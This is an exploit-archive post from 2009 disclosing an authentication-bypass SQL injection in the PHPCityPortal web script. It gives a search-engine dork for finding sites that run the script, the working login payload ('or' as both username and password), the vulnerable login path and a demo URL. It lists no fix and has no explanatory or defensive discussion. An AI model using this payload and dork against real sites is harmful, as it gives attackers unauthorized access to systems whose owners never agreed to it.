PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability
2009-08-07 21:52:27******************************************************************************************
Script Name: PHPCityPortal (Auth Bypass) SQL Injection Vulnerability
Author: CoBRa_21
Mail: [email protected]
Script Page: http://phpcityportal.com/
DOrk: intext:"Powered by PHPCityPortal.com"
******************************************************************************************
EXPLOIT
Username: 'or'
Password: 'or'
http://localhost/[path]/login.php
Demo: http://phpcityportal.com/demo/login.php
******************************************************************************************
#
Fixes
No fixesIn order to submit a new fix you need to be registered.